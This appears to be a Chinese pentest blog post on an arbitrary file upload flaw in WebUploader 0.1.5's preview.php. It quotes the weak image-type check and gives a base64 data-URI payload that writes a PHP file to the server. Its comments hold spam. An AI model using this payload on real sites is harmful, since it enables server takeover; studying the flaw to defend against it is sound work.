请输入关键字进行搜索...

神王姜太虚

文章 分类 评论
18 7 2
联系我
this blog is by @神王姜太虚 - 关注网络安全

站点介绍

这里是站点介绍...

webuploader编辑器任意上传漏洞

admin 2022-09-16 287 0条评论 渗透测试代码审计 webuploader上传漏洞

首页 / 正文
今天遇到了一个TP框架

PHP5.6 一开始以为可以直接秒 结果 妈的 写入不了

只能换个思路 看着以前留下的shell痕迹 发现是一个编辑器的上传

Webuploader编辑器

然后去下了一套源码回来看了一下

漏洞文件路径:webuploader/0.1.5/server/preview.php

看代码的41-50行

if (preg_match("#^data:image/(\w+);base64,(.*)$#", $src, $matches)) {

    $previewUrl = sprintf(
        "%s://%s%s",
        isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 'https' : 'http',
        $_SERVER['HTTP_HOST'],
        $_SERVER['REQUEST_URI']
    );
    $previewUrl = str_replace("preview.php", "", $previewUrl);


    $base64 = $matches[2];
    $type = $matches[1];
    if ($type === 'jpeg') {
        $type = 'jpg';
    }

代码判断不严谨,仅仅判断了是什么图片,殊不知有些可以传php后缀的

我们用burp来试试 我们需要将我们需要写入的内容转换成base64

然后我们来构造一下

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+

这不就美滋滋了吗

版权所属: admin
本文链接: https://shenwang.vip/archives/9/
网络安全法: 《请勿恶意攻击网站,本网站全部由靶机操作》
下一篇 上一篇

评论(0)

最新评论

  • cheap cialis

    Awesome! Its genuinely amazing piece of writing, I have got much clear idea about from this paragraph.

  • apporabow

    Issuer services logged a strong increase of 24 relative to 1Q 13 due to increased corporate actions and technology reimbursements clomid by avents We are therefore revising our estimate to be 2

日历

2023年05月

 123456
78910111213
14151617181920
21222324252627
28293031   

标签云

Getshell PHP大马 宝塔WAF Redis SQL注入 弱口令 权限维护 webuploader 上传漏洞 fofa wx聊天记录 信息收集 贷超后台 laravel框架 阿里云ACCESSKEYID 百家骏CMS 蚁剑编码 脚本之家 weiphp 代码审计 云安全 AWS 渗透总结 OA利用工具 Exp-Tools 中文转拼音 百度seo 免杀大马 typecho 前台getshell

友情链接

文章目录

推荐关键字: Getshell PHP大马 宝塔WAF Redis SQL注入 弱口令 权限维护 webuploader 上传漏洞 fofa